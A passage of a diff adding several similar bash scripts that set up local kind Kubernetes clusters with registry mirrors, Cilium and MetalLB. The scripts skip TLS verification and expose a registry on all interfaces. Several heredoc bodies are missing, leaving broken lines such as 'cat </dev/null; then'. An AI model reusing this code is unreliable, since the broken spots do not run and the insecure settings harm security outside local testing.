'.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +# Preload images +cat << EOF >> images.txt +quay.io/cilium/cilium:v1.15.5 +quay.io/cilium/operator-generic:v1.15.5 +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f 
https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! 
kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + 
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: 
metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! 
kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +- role: worker + image: ${kindest_node} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + 
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: 
metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: 
+- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 
+done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + 
endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +helm repo add cilium https://helm.cilium.io/ + +helm --kube-context kind-kind${number} install cilium cilium/cilium --version 1.15.5 \ + --namespace kube-system \ + --set prometheus.enabled=true \ + --set operator.prometheus.enabled=true \ + --set hubble.enabled=true \ + --set hubble.metrics.enabled="{dns:destinationContext=pod|ip;sourceContext=pod|ip,drop:destinationContext=pod|ip;sourceContext=pod|ip,tcp:destinationContext=pod|ip;sourceContext=pod|ip,flow:destinationContext=pod|ip;sourceContext=pod|ip,port-distribution:destinationContext=pod|ip;sourceContext=pod|ip}" \ + --set hubble.relay.enabled=true \ + --set hubble.ui.enabled=true \ + --set kubeProxyReplacement=partial \ + --set hostServices.enabled=false \ + --set hostServices.protocols="tcp" \ + --set externalIPs.enabled=true \ + --set nodePort.enabled=true \ + --set hostPort.enabled=true \ + --set bpf.masquerade=false \ + --set image.pullPolicy=IfNotPresent \ + --set cni.exclusive=false \ + --set ipam.mode=kubernetes +kubectl --context=kind-kind${number} -n kube-system rollout status ds cilium || true 
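Each kind cluster in the deploy scripts above carves out its own service and pod CIDRs from the zero-padded cluster number (`twodigits`). A minimal standalone sketch of that derivation, using the same `printf`/`sed` expressions as the scripts (the value `number=3` is purely illustrative; the real scripts compute it from the existing kind clusters):

```shell
#!/usr/bin/env bash
# Illustrative cluster number (the deploy scripts derive this from `kind get clusters`).
number=3

# Zero-pad to two digits, e.g. 3 -> "03".
twodigits=$(printf "%02d" "$number")

# Service CIDR strips the leading zeros: "03" -> 3 -> 10.3.0.0/16.
service_subnet="10.$(echo "$twodigits" | sed 's/^0*//').0.0/16"

# Pod CIDR prefixes a "1" and keeps the padding: "03" -> 10.103.0.0/16.
pod_subnet="10.1${twodigits}.0.0/16"

echo "$service_subnet $pod_subnet"   # 10.3.0.0/16 10.103.0.0/16
```

Keeping these ranges disjoint per cluster number is what lets several kind clusters share the same Docker network without overlapping CIDRs.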
+ +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# 
https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + 
[plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +for i in 1 2 3 4 5; do kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml && break || sleep 15; done +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: 
L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +# connect the registry to the cluster network if not already connected +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done + +# Document the local registry +# https://github.com/kubernetes/enhancements/tree/master/keps/sig-cluster-lifecycle/generic/1755-communicating-a-local-registry +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + 
image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
